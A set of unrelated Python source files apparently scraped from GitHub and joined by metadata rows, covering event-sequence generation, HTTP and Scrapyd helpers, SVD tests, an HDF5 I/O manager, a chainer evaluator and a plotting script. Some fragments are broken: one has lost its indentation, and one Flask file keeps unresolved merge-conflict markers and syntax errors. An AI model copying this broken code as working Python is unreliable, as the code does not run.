            type_event_new = numpy.argmin(time_of_happen)
            self.cnt_total_event += 1
            #
            # update sequence
            time_since_last_event = time_since_start_new - time_since_start
            time_since_start = time_since_start_new
            time_since_last_same_event = time_since_start - time_since_start_each_event[type_event_new]
            time_since_start_each_event[type_event_new] = time_since_start
            self.one_seq.append(
                {
                    'idx_event': self.cnt_total_event,
                    'type_event': type_event_new,
                    'time_since_start': time_since_start,
                    'time_since_last_event': time_since_last_event,
                    'time_since_last_same_event': time_since_last_same_event
                }
            )
        #
        # throw away the BOS item
        # at the head of the sequence
        self.one_seq.pop(0)
#
#
#
def gen_seqs(self, settings):
#
#print(settings)
print("generating sequences ... ")
num_seqs = settings['num_seqs']
#
self.list_seqs = []
cnt_seqs = 0
#for idx_seq in range(num_seqs):
while cnt_seqs < num_seqs:
#
max_len = numpy.int32(
round(
numpy.random.uniform(
low=settings['min_len'],
high=settings['max_len']
)
)
)
#
self.gen_one_seq(max_len)
self.list_seqs.append(self.one_seq)
cnt_seqs += 1
if cnt_seqs % 10 == 9:
print("idx seq of gen : ", (cnt_seqs, self.name))
print("total number of seqs : ", num_seqs)
#
#
def print_some(self):
print("printing some seqs ... ")
for idx_seq in range(10):
print("the id of this seq is : ", idx_seq)
seq = self.list_seqs[idx_seq]
list_events = []
list_time = []
list_dtime = []
list_items = []
for event_item in seq:
list_events.append(event_item['type_event'])
list_time.append(
round(event_item['time_since_start'], 4)
)
list_dtime.append(
round(event_item['time_since_last_event'], 4)
)
list_items.append(
(
event_item['type_event'],
round(
event_item['time_since_last_event'], 4
)
)
)
print("the events, time and diff time for : ", idx_seq)
print(list_events)
print(list_time)
print(list_dtime)
print("the list of items is : ")
print(list_items)
#
#
def save_seqs(self, file_save):
with open(file_save, 'wb') as f:
pickle.dump(self.list_seqs, f)
#
#
| 33.405162 | 114 | 0.510137 | 140,266 | 0.994301 | 0 | 0 | 0 | 0 | 0 | 0 | 29,577 | 0.209662 |
44503eada61c7c6d19634eb06fc44feea60e5c94 | 2,445 | py | Python | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | 3 | 2020-04-15T19:58:37.000Z | 2020-06-24T14:08:48.000Z | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | null | null | null | SeeThru_Feeds/Library/Components/HTTP.py | SeeThru-Networks/Python-Feed | 9c29fcf3462475e339f95d3e9766ed3a652ee6c0 | [
"MIT"
] | null | null | null | from SeeThru_Feeds.Model.Components.ComponentBase import ComponentBase
from SeeThru_Feeds.Model.Properties.Properties import FillableProperty, ResultProperty
import requests
class HTTPBase(ComponentBase):
    """Shared property declarations for the HTTP components.

    Declares the fillable inputs (URL, cookies, headers) and the result
    slots that subclasses populate after executing a request.
    """
    URL = FillableProperty(name="url", required=True)
    COOKIES = FillableProperty(name="cookies", required=False)
    HEADERS = FillableProperty(name="header", required=False, default=None, of_type=dict)
    # Result slots filled by subclasses from the requests.Response object.
    RESPONSE = ResultProperty(name="response")
    STATUS_CODE = ResultProperty(name="status_code")
    RESPONSE_CONTENT = ResultProperty(name="response_content")
    RESPONSE_URL = ResultProperty(name="response_url")
    # Component metadata consumed by the surrounding framework.
    Component_Title = "HTTP Component"
    Component_Description = "This component provides a wrapper over the requests http methods to make them follow the component design rules"
    Component_Author = "SeeThru Networks"
    Component_Owner = "SeeThru Networks"
class HTTPGet(HTTPBase):
    """HTTP GET component: issues the request and stores the results."""
    def component_execute(self):
        # Perform the GET using the configured URL, cookies and headers.
        response = requests.get(self.get_property(
            HTTPBase.URL), cookies=self.get_property(HTTPBase.COOKIES), headers=self.get_property(HTTPBase.HEADERS))
        # Copy the response into the component's result properties.
        self.set_property(HTTPGet.RESPONSE, response)
        self.set_property(HTTPGet.STATUS_CODE, response.status_code)
        # NOTE(review): this overwrites the fillable COOKIES input with the
        # response cookies — confirm downstream consumers expect that.
        self.set_property(HTTPGet.COOKIES, response.cookies)
        self.set_property(HTTPGet.RESPONSE_CONTENT, response.text)
        self.set_property(HTTPGet.RESPONSE_URL, response.url)
class HTTPPost(HTTPBase):
    """HTTP POST component: sends form data and/or a JSON body."""
    DATA = FillableProperty(name="data")
    JSON = FillableProperty(name="json", of_type=dict, required=False)
    # Default Content-Type used when the caller supplies no headers.
    CONTENT_TYPE = FillableProperty(
        name="content_type", default="application/x-www-form-urlencoded")
    def component_execute(self):
        # If no headers were provided, synthesize one carrying the
        # configured Content-Type so the POST body is interpreted correctly.
        if self.get_property(HTTPBase.HEADERS) is None:
            self.set_property(HTTPBase.HEADERS, {'Content-Type': self.get_property(self.CONTENT_TYPE)})
        response = requests.post(
            self.get_property(HTTPPost.URL),
            cookies=self.get_property(HTTPPost.COOKIES),
            data=self.get_property(HTTPPost.DATA),
            json=self.get_property(HTTPPost.JSON),
            headers=self.get_property(HTTPBase.HEADERS)
        )
        # Copy the response into the component's result properties.
        self.set_property(HTTPPost.RESPONSE, response)
        self.set_property(HTTPPost.STATUS_CODE, response.status_code)
        self.set_property(HTTPPost.RESPONSE_CONTENT, response.text)
        self.set_property(HTTPPost.RESPONSE_URL, response.url)
| 45.277778 | 141 | 0.737423 | 2,262 | 0.925153 | 0 | 0 | 0 | 0 | 0 | 0 | 317 | 0.129652 |
445366866803a78fbcbc59c0c86e7e7c1ab75d5c | 425 | py | Python | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 3 | 2019-08-20T12:33:06.000Z | 2019-12-28T17:05:30.000Z | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 6 | 2020-06-05T22:31:56.000Z | 2022-02-10T12:33:45.000Z | scrapyd_dash/operations/versions_delete.py | Dainius-P/scrapyd-dash | f769551070c919ba41616928309460a93e1b120a | [
"MIT"
] | 1 | 2020-12-10T07:02:06.000Z | 2020-12-10T07:02:06.000Z | import requests
"""
Delete a project version.
If there are no more versions available for a given project, that project will be deleted too.
"""
def delete_version(server, project, version):
    """Delete a project version on a Scrapyd server.

    If there are no more versions available for a given project, the
    server deletes the project too (delversion.json semantics).

    Returns the decoded JSON response, or None if the request failed.
    """
    url = "http://{}/delversion.json".format(server)
    data = {
        "project": project,
        "version": version
    }
    with requests.Session() as session:
        try:
            r = session.post(url, data=data)
        except requests.RequestException:
            # Only network/HTTP-level failures mean "no response"; the
            # original bare `except:` also swallowed KeyboardInterrupt
            # and programming errors, hiding real bugs.
            return None
    return r.json()
| 19.318182 | 94 | 0.691765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 174 | 0.409412 |
4453e7148b48df800b321d8e53272108159d1a65 | 346 | py | Python | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | 1 | 2018-12-27T12:58:46.000Z | 2018-12-27T12:58:46.000Z | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | null | null | null | login.py | kepler0301/test_git | 22b42b627b26224fff0bef29e43937b6a08c968a | [
"MIT"
] | null | null | null | print('helo world')
<<<<<<< HEAD
from flask import Flask
app = Flask(__name__)
def index():
return 'hello world'
id __name__ == '__main__'
app.run()
=======
from flask import Flask
app = Flask(__name__)
@app/route('/')
def index():
return 'hello world'
>>>>>>> b644c89d3eb5e1fcd31fedf63470ab57d597d9dd
print('bey')
num1 = 40
| 13.307692 | 48 | 0.647399 | 0 | 0 | 0 | 0 | 53 | 0.153179 | 0 | 0 | 56 | 0.16185 |
4453ea47443b6a656e1a8c29bb3c6e06d0db3779 | 2,922 | py | Python | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | null | null | null | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | 10 | 2020-11-12T14:46:45.000Z | 2020-11-13T05:30:36.000Z | tests/test_svd.py | owenl131/pylinlin | 07bb226cf5506b9e0633a35e5b4ce336ab0e5ba3 | [
"MIT"
] | null | null | null | import pytest
from pylinlin.matrix import Matrix
from pylinlin.matrix_view import MatrixView
import pylinlin.matrix_utils as utils
from pylinlin.svd import \
compute_svd, \
reduce_to_bidiagonal, \
compute_svd_bidiagonal
class TestSVD:
    """Tests for SVD computation via reduction to bidiagonal form."""

    def test_reduce_to_bidiagonal(self):
        # B must be upper triangular overall and, once the first column
        # is dropped, lower triangular too -> only the main diagonal and
        # first superdiagonal may be nonzero (bidiagonal).
        mat = Matrix.from_cols([[1, 2, 3], [4, 5, 6], [7, 8, 10]])
        b, _, _ = reduce_to_bidiagonal(mat)
        utils.assert_upper_triangular(b)
        truncated = MatrixView.with_size(
            b, (0, 1), (mat.num_rows() - 1, mat.num_cols() - 1)
        ).to_matrix()
        utils.assert_lower_triangular(truncated)
    def test_bidiagonal_recreate(self):
        # Applying the Householder reflectors back in reverse order must
        # reconstruct the original matrix from B.
        mat = Matrix.from_cols([[1, 2, 3], [4, 5, 6], [7, 8, 10]])
        b, left, right = reduce_to_bidiagonal(mat)
        for index, hh in list(enumerate(left))[::-1]:
            b = hh.multiply_left(b, index)
        for index, hh in list(enumerate(right))[::-1]:
            b = hh.multiply_right(b, index + 1)
        utils.assert_matrix_equal(mat, b)
    def test_bidiagonal_recreate_2(self):
        # Same reconstruction check with a matrix containing negatives.
        mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2]])
        b, left, right = reduce_to_bidiagonal(mat)
        for index, hh in list(enumerate(left))[::-1]:
            b = hh.multiply_left(b, index)
        for index, hh in list(enumerate(right))[::-1]:
            b = hh.multiply_right(b, index + 1)
        utils.assert_matrix_equal(mat, b)
    def check_svd(self, u, s, v, mat):
        # Shared validity checks: U, V orthonormal; S diagonal with
        # non-negative entries sorted in decreasing order; U S V^T == mat.
        utils.assert_orthonormal(u)
        utils.assert_orthonormal(v)
        utils.assert_lower_triangular(s)
        utils.assert_upper_triangular(s)
        diagonal = utils.extract_diagonal(s)
        for i in range(len(diagonal) - 1):
            assert diagonal[i] >= diagonal[i+1]
        for elem in diagonal:
            assert elem >= 0
        product = u.multiply(s).multiply(v.transpose())
        product.print_full()
        mat.print_full()
        utils.assert_matrix_equal(product, mat)
    def test_svd_bidiagonal(self):
        mat = Matrix.from_cols([[1, 0, 0], [2, 3, 0], [0, 4, 5]])
        u, s, v = compute_svd_bidiagonal(mat)
        self.check_svd(u, s, v, mat)
    def test_svd_bidiagonal_2(self):
        mat = Matrix.from_cols(
            [[3.742, 0, 0], [4.018, 3.511, 0], [0, -3.408, -1.979]])
        u, s, v = compute_svd_bidiagonal(mat)
        self.check_svd(u, s, v, mat)
    def test_svd_square(self):
        mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2]])
        u, s, v = compute_svd(mat)
        self.check_svd(u, s, v, mat)
    def test_svd_more_rows(self):
        # Tall matrix (4x3).
        mat = Matrix.from_cols([[1, 2, 3, 1], [2, 5, 1, 0], [-1, 3, -2, -2]])
        u, s, v = compute_svd(mat)
        self.check_svd(u, s, v, mat)
    def test_svd_more_cols(self):
        # Wide matrix (3x4).
        mat = Matrix.from_cols([[1, 2, 3], [2, 5, 1], [-1, 3, -2], [3, 2, 1]])
        u, s, v = compute_svd(mat)
        self.check_svd(u, s, v, mat)
| 36.525 | 78 | 0.577687 | 2,687 | 0.919576 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
4457c61974adf6ea23263c3521814d88592f3989 | 198 | py | Python | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | 1 | 2022-03-15T21:44:50.000Z | 2022-03-15T21:44:50.000Z | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | null | null | null | translateSfw.py | tkarabela/translate-swf | 4756079294de9faa55d95b320d9b8a5ae6c40104 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import pyTranslateSwf
import sys
def main():
    """Run the pyTranslateSwf command-line interface; return its exit status."""
    command_line = pyTranslateSwf.PyTranslateSwfCLI()
    arguments = sys.argv[1:]
    return command_line.run(arguments)


if __name__ == '__main__':
    sys.exit(main())
| 15.230769 | 44 | 0.681818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 32 | 0.161616 |
44588a8251975fab2aceaf05fcf35cad8b89e5fe | 656 | py | Python | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null | GT/GT_app/models.py | 10K-Linesofcode/Glowing-Tribble | be0e17ce5391b589792e4ae6b02156d7ee4ce145 | [
"MIT"
] | null | null | null |
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Topic(models.Model):
    """A top-level topic that groups related webpages."""
    # Unique display name of the topic.
    top_name= models.CharField(max_length=264,unique=True)
    def __str__(self):
        return self.top_name
class Webpage(models.Model):
    """A webpage belonging to a Topic, with a unique name and URL."""
    # Owning topic; DO_NOTHING means topic deletion is not cascaded here.
    topic=models.ForeignKey(Topic,on_delete=models.DO_NOTHING)
    name=models.CharField(max_length=264,unique=True)
    url=models.URLField(unique=True)
    def __str__(self):
        return self.name
class AccessRecord(models.Model):
    """Records the date on which a Webpage was accessed."""
    # The accessed webpage (the FK field is named 'name' in this schema).
    name=models.ForeignKey(Webpage,on_delete=models.DO_NOTHING)
    date = models.DateField()
    def __str__(self):
        return str(self.date)
| 22.62069 | 63 | 0.731707 | 550 | 0.838415 | 0 | 0 | 0 | 0 | 0 | 0 | 26 | 0.039634 |
445cac484200f11a9ce597a53a164ef8e3583569 | 13,084 | py | Python | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | 3 | 2016-09-01T21:13:54.000Z | 2020-03-23T15:45:32.000Z | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | null | null | null | WaveBlocksND/IOManager.py | raoulbq/WaveBlocksND | 225b5dd9b1af1998bd40b5f6467ee959292b6a83 | [
"BSD-3-Clause"
] | 6 | 2016-03-16T15:22:01.000Z | 2021-03-13T14:06:54.000Z | """The WaveBlocks Project
This file contains code for serializing simulation data.
@author: R. Bourquin
@copyright: Copyright (C) 2010, 2011, 2012, 2016 R. Bourquin
@license: Modified BSD License
"""
import os
import types
import pickle
import json
import six
import h5py as hdf
import numpy as np
__all__ = ["IOManager"]
class IOManager(object):
    """An IOManager class that can save various simulation results into data
    files. For storing the data we use the well established HDF5 file format.
    An IOManager instance abstracts the input and output operations and translates
    requests into low-level operations.
    """
    def __init__(self):
        # Version tag written into every file this manager creates.
        self._hdf_file_version = 2
        # HDF5 group-name prefixes for data blocks and block groups.
        self._prefixb = "datablock_"
        self._prefixg = "group_"
        # The current open data file
        self._srf = None
        # Book keeping data
        # TODO: consider storing these values inside the data files
        self._block_ids = None
        self._block_count = None
        self._group_ids = None
        self._group_count = None
    def __str__(self):
        if self._srf is None:
            s = "IOManager instance without an open file."
        else:
            s = "IOManager instance with open file " + str(self._srf.filename) + "\n"
            s += " containing " + str(self._block_count) + " data blocks in "
            s += str(self._group_count) + " data groups."
        return s
    def __getattr__(self, key):
        """Try to load a plugin if a member function is not available.
        Plugins implement the actual I/O operations for specific data objects.
        """
        parts = key.split("_")
        # Plugin name convention, we only trigger plugin loading
        # for requests starting with "add", "load" or "save".
        # However, IF we load a plugin, we load ALL functions it defines.
        if parts[0] not in ("add", "delete", "has", "load", "save", "update"):
            # Implicitly returns None for any other missing attribute
            # (callers then see None instead of an AttributeError).
            return
        else:
            print("Requested function: {}".format(key))
            name = "IOM_plugin_" + parts[1]
        # Load the necessary plugin
        print("Plugin to load: {}".format(name))
        try:
            plugin = __import__(name)
        except ImportError:
            raise ImportError("IOM plugin '{}' not found!".format(name))
        # Filter out functions we want to add to IOM and
        # bind the methods to the current IOM instance
        for k, v in plugin.__dict__.items():
            if isinstance(v, types.FunctionType):
                self.__dict__[k] = types.MethodType(v, self)
        # Now return the new function to complete it's call
        return self.__dict__[key]
    def create_file(self, filename):
        """Set up a new :py:class:`IOManager` instance. The output file is created and opened.

        :param filename: The filename (optionally with filepath) of the file we try to create.
                         If not given the default value from `GlobalDefaults` is used.
        """
        # Create the file if it does not yet exist.
        # Otherwise raise an exception to avoid overwriting data.
        if os.path.lexists(filename):
            raise IOError("Output file '{}' already exists!".format(filename))
        else:
            # NOTE(review): hdf.File(filename) relies on h5py's historical
            # default mode; recent h5py requires an explicit mode — confirm
            # the pinned h5py version.
            self._srf = hdf.File(filename)
        # Initialize the internal book keeping data
        self._block_ids = []
        self._block_count = 0
        self._group_ids = []
        self._group_count = 0
        # The version of the current file format
        self._srf.attrs["file_version"] = self._hdf_file_version
        # Save the simulation parameters
        self.create_group(groupid="global")
        self.create_block(blockid="global", groupid="global")
    def open_file(self, filename):
        """Load a given file that contains the results from another simulation.

        :param filename: The filename (optionally with filepath) of the file we try to load.
                         If not given the default value from `GlobalDefaults` is used.
        """
        # Try to open the file or raise an exception if it does not exist.
        if os.path.lexists(filename):
            if hdf.is_hdf5(filename):
                self._srf = hdf.File(filename)
            else:
                raise IOError("File '{}' is not a hdf5 file".format(filename))
        else:
            raise IOError("File '{}' does not exist!".format(filename))
        # Check if the file format can be read by the IOManager
        if "file_version" not in self._srf.attrs.keys():
            print("Warning: Unsupported file format without version number")
        else:
            if self._srf.attrs["file_version"] != self._hdf_file_version:
                raise IOError("Unsupported file format version " + str(self._srf.attrs["file_version"]))
        # Initialize the internal book keeping data
        # (block/group IDs are recovered from the HDF5 group names by
        # stripping the respective prefixes).
        self._block_ids = [s[len(self._prefixb):] for s in self._srf.keys() if s.startswith(self._prefixb)]
        self._block_count = len(self._block_ids)
        self._group_ids = [s[len(self._prefixg):] for s in self._srf.keys() if s.startswith(self._prefixg)]
        self._group_count = len(self._group_ids)
    def finalize(self):
        """Close the open output file and reset the internal information."""
        if self._srf is None:
            return
        # Close the file
        self._srf.flush()
        self._srf.close()
        self._srf = None
        # Reset book keeping data
        self._block_ids = None
        self._block_count = None
        self._group_ids = None
        self._group_count = None
    def get_number_blocks(self, groupid=None):
        """Return the number of data blocks in the current file structure.

        :param groupid: An optional group ID. If given we count only data blocks which are a
                        member of this group. If it is ``None`` (default) we count all data blocks.
        """
        if groupid is None:
            return self._block_count
        else:
            return len(self.get_block_ids(groupid=groupid))
    def get_number_groups(self):
        """Return the number of data block groups in the current file structure.
        """
        return self._group_count
    def get_block_ids(self, groupid=None, grouped=False):
        """Return a list containing the IDs for all blocks in the current file structure.

        :param groupid: An optional group ID. If given we return only block IDs for blocks
                        which are a member of this group. If it is ``None`` we return all block IDs.
        :param grouped: If ``True`` we group the block IDs by their group into lists.
                        This option is only relevant in case the `groupid` is not given.
        """
        if groupid is not None:
            if str(groupid) in self._group_ids:
                return self._srf["/" + self._prefixg + str(groupid)].keys()
            else:
                return []
        else:
            if grouped is False:
                return self._block_ids[:]
            else:
                return [self._srf["/" + self._prefixg + str(gid)].keys() for gid in self.get_group_ids()]
    def get_group_ids(self, exclude=[]):
        """Return a list containing the IDs for all groups in the current file structure.

        :param exclude: A list of group IDs to exclude. Per default no group is excluded.
        """
        # NOTE: the mutable default is safe here because `exclude` is only
        # read, never mutated.
        return [gid for gid in self._group_ids if gid not in exclude]
    def get_group_of_block(self, blockid):
        """Return the ID of the group a given block belongs to or ``None``
        if there is no such data block.

        :param blockid: The ID of the given block.
        """
        if str(blockid) in self._block_ids:
            return self._srf["/" + self._prefixb + str(blockid)].attrs["group"]
        else:
            return None
    def create_block(self, *, blockid=None, groupid="global", **blockattributes):
        """Create a data block with the specified block ID. Each data block can
        store several chunks of information, and there can be an arbitrary number
        of data blocks per file.

        :param blockid: The ID for the new data block. If not given the blockid will
                        be choosen automatically. The block ID has to be unique.
        :return: The block ID of the created block.
        """
        # Silently do nothing when no file is open.
        if self._srf is None:
            return
        if blockid is not None and (not str(blockid).isalnum()):
            raise ValueError("Block ID allows only characters A-Z, a-z and 0-9 and no leading digit.")
        if blockid is not None and str(blockid) in self._block_ids:
            raise ValueError("Invalid or already used block ID: " + str(blockid))
        if blockid is None:
            # Try to find a valid autonumber
            autonumber = 0
            while str(autonumber) in self._block_ids:
                autonumber += 1
            blockid = str(autonumber)
        self._block_ids.append(str(blockid))
        self._block_count += 1
        # Create the data block
        datablock = self._srf.create_group("/" + self._prefixb + str(blockid))
        # Does the group already exist?
        if not str(groupid) in self._group_ids:
            self.create_group(groupid=groupid)
        # Put the data block into the group
        # (a SoftLink makes the block visible under its group's path too)
        datablock.attrs["group"] = str(groupid)
        self._srf["/" + self._prefixg + str(groupid) + "/" + str(blockid)] = hdf.SoftLink("/" + self._prefixb + str(blockid))
        # Write some extended attributes
        for attribute, value in blockattributes.items():
            datablock.attrs['ext:' + attribute] = str(value)
        return blockid
    def create_group(self, groupid=None):
        """Create a data group with the specified group ID. Each data group can
        contain an arbitrary number of data blocks, and there can be an arbitrary
        number of data groups per file.

        :param groupid: The ID for the new data group. If not given the group ID will
                        be chosen automatically. The group ID has to be unique.
        :return: The group ID of the created group.
        """
        # Silently do nothing when no file is open.
        if self._srf is None:
            return
        if groupid is not None and (not str(groupid).isalnum()):
            raise ValueError("Group ID allows only characters A-Z, a-z and 0-9 and no leading digit.")
        if groupid is not None and str(groupid) in self._group_ids:
            raise ValueError("Invalid or already used group ID: " + str(groupid))
        if groupid is None:
            # Try to find a valid autonumber
            autonumber = 0
            while str(autonumber) in self._group_ids:
                autonumber += 1
            groupid = str(autonumber)
        self._group_ids.append(str(groupid))
        self._group_count += 1
        # Create the group
        self._srf.create_group("/" + self._prefixg + str(groupid))
        return groupid
    def must_resize(self, path, size, axis=0):
        """Check if we must resize a given dataset and if yes, resize it.
        """
        # Ok, it's inefficient but sufficient for now.
        # TODO: Consider resizing in bigger chunks and shrinking at the end if necessary.
        # Current size of the array
        cur_len = self._srf[path].shape[axis]
        # Is the current size smaller than the new "size"?
        # If yes, then resize the array along the given axis.
        if cur_len - 1 < size:
            self._srf[path].resize(size + 1, axis=axis)
    def find_timestep_index(self, timegridpath, timestep):
        """Lookup the index for a given timestep. This assumes the timegrid
        array is strictly monotone.
        """
        # TODO: Allow for slicing etc
        timegrid = self._srf[timegridpath][:]
        index = (timegrid == timestep)
        nrvals = np.sum(index)
        # Strict monotonicity implies exactly one match; anything else is
        # an error.
        if nrvals < 1:
            raise ValueError("No index for given timestep!")
        elif nrvals > 1:
            raise ValueError("Multiple indices for given timestep!")
        else:
            return int(np.where(index)[0])
    def split_data(self, data, axis):
        """Split a multi-dimensional data block into slabs along a given axis.

        :param data: The data tensor given.
        :param axis: The axis along which to split the data.
        :return: A list of slices.
        """
        # One slab per index along `axis`.
        parts = data.shape[axis]
        return np.split(data, parts, axis=axis)
    def _save_attr_value(self, value):
        # TODO: Fix for old python 2.x
        # Remove after 3.x transition
        # Store all the values as pickled strings because hdf can
        # only store strings or ndarrays as attributes.
        bpv = pickle.dumps(value)
        if not isinstance(bpv, bytes):
            bpv = six.b(bpv)
        # np.void wraps the opaque bytes so h5py stores them verbatim.
        npvbpv = np.void(bpv)
        return npvbpv
    def _load_attr_value(self, value):
        # TODO: Fix for old python 2.x
        # Remove after 3.x transition
        npvbpv = value
        # NOTE(review): value.tobytes(npvbpv) passes the value itself where
        # tobytes normally takes a memory-order argument — looks suspicious;
        # confirm against an h5py attribute round-trip.
        bpv = value.tobytes(npvbpv)
        pv = pickle.loads(bpv)
        return pv
| 36.64986 | 125 | 0.608759 | 12,755 | 0.974855 | 0 | 0 | 0 | 0 | 0 | 0 | 6,154 | 0.470345 |
445e24e9f950050d099133d81a9287a8a72037c0 | 1,738 | py | Python | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 13 | 2019-10-01T08:35:47.000Z | 2022-02-07T03:24:05.000Z | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | null | null | null | models/evaluater.py | pfnet-research/step-wise-chemical-synthesis-prediction | a24a88f648d353c2833827715068c90615899ed4 | [
"MIT"
] | 2 | 2021-08-12T05:14:45.000Z | 2021-11-30T07:29:31.000Z | import chainer
from chainer import functions, reporter
import cupy as cp
class FrameworEvaluater(chainer.Chain):
    '''
    Evaluator that runs each separate sub-network (stop / atom / pair /
    action) on a batch and reports their losses and accuracies.
    '''
    def __init__(self, g_stop, g_atom, g_pair, g_action):
        # Sub-models, one per prediction task.
        self.g_stop = g_stop
        self.g_atom = g_atom
        self.g_pair = g_pair
        self.g_action = g_action
        super(FrameworEvaluater, self).__init__()
    def __call__(self, f_atoms, f_bonds, super_node_x,
                 atom_label, mask_reagents, mask_reactants_reagents, pair_label, mask_pair_select,
                 action, step_num,
                 stop_idx,
                 sample_index):
        # Shift labels/masks from their stored 1-based (resp. offset)
        # encodings to 0-based indices.
        # NOTE(review): these decrements mutate the caller's arrays in
        # place — confirm the iterator supplies fresh batches each call.
        atom_label -= 1
        mask_reagents -= 2
        mask_reactants_reagents -= 2
        action -= 1
        batch_size = action.shape[0]
        # f_bonds is copied (cp.copy) before each sub-model call so one
        # model's in-place edits cannot leak into the next.
        # atom
        loss_atom, acc_atom, atoms_selected = self.g_atom(f_atoms, cp.copy(f_bonds), super_node_x, atom_label, mask_reagents, mask_reactants_reagents, batch_size)
        # pair
        loss_pair = self.g_pair(f_atoms, cp.copy(f_bonds), super_node_x, action, pair_label, mask_pair_select, batch_size, atoms_selected)
        # action
        loss_action, acc_action = self.g_action(f_atoms, cp.copy(f_bonds), super_node_x, action, batch_size)
        # stop
        loss_stop, acc_stop = self.g_stop(f_atoms, cp.copy(f_bonds), super_node_x, stop_idx, action, batch_size)
        # Publish all metrics to chainer's reporter under this link.
        reporter.report({
            'loss_stop': loss_stop,
            'loss_atom': loss_atom,
            'loss_pair': loss_pair,
            'loss_action': loss_action,
            'acc_stop': acc_stop,
            'acc_atom': acc_atom,
            # 'acc_pair': acc_pair, # acc_pair need to be further extended
            'acc_action': acc_action,
        }, self)
| 32.792453 | 162 | 0.634062 | 1,662 | 0.956272 | 0 | 0 | 0 | 0 | 0 | 0 | 220 | 0.126582 |
445e689615f50b3103fabda264a4d3bf138fe65a | 1,968 | py | Python | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | Scripts/domain-db-all-domain-rates.py | colinwalshbrown/CWB_utils | 86675812f9398845d1994b57500830e2c3dc6cc0 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import sys
import sqlite3
import matplotlib.pyplot as plt
import numpy as np
def main(args):
    """Compute and plot the per-family median pairwise amino-acid rate
    between 'dmel' and a second species from a domain sqlite database.

    args: [db_path, species2].
    Side effects: shows a histogram, saves it as SVG, and writes a
    tab-separated file of the median rates.
    """
    if len(args) < 2:
        print "usage: domain-db-all-domain-rates.py <db> <species>"
        sys.exit(1)
    conn = sqlite3.connect(args[0])
    # Row factory gives dict-style access to columns by name below.
    conn.row_factory = sqlite3.Row
    cur = conn.cursor()
    sp1 = 'dmel'
    sp2 = args[1]
    domains = {}
    # Load every Pfam model into an in-memory dict keyed by domain name.
    cur.execute("""SELECT * FROM pfam_model""")
    dom_list = cur.fetchall()
    for x in dom_list:
        d = {'desc':x['description'],
             'length':x['length'],
             'acc':x['accession'],
             'pfam_id':x['pfam_id']}
        domains[x['name']] = d
    print "%s domains found" % len(domains.keys())
    cnt = 0
    # For each domain family, fetch all pairwise rates for the species pair
    # and record that family's median rate.
    for (k,d) in domains.items():
        print "searching %s %s..." % (k,d['pfam_id'])
        cur.execute("""SELECT r.rate
                       FROM domain_pw_aa_rates r JOIN dmel_pfam_domain d
                       ON r.dmel_pfam_domain_id = d.dmel_pfam_domain_id
                       WHERE ((d.pfam_id = ?) AND (r.species1 = ?)) AND (r.species2 = ?)""", (str(d['pfam_id']),sp1,sp2))
        rates_result = cur.fetchall()
        print len(rates_result)
        rates = np.array([float(x['rate']) for x in rates_result])
        # np.median of an empty array is nan, which the ">= 0" filter
        # below silently drops.
        med = np.median(rates)
        d['med'] = med
        print "%d %s: %s median = %s" % (cnt,k,'dmel_' + sp2,med)
        cnt += 1
    median_rates = np.array([x['med'] for x in domains.values() if x['med'] >= 0])
    print median_rates
    plt.figure(1,figsize=(7,7))
    plt.hist(median_rates,bins=50)
    plt.xlabel("Per-family Median Pairwise %s-%s AA rate" % (sp1,sp2))
    plt.ylabel("Family Count")
    plt.show()
    # NOTE(review): savefig after show() may write an empty figure on some
    # backends — confirm the intended call order.
    plt.savefig("%s_all-domain-median-rates.svg" % (args[0],),format="svg")
    # NOTE(review): rout is never closed/flushed explicitly.
    rout = open("%s-%s_domains_median-rates.txt" % (sp1,sp2),"w")
    print >> rout, "\t".join([str(x) for x in median_rates])
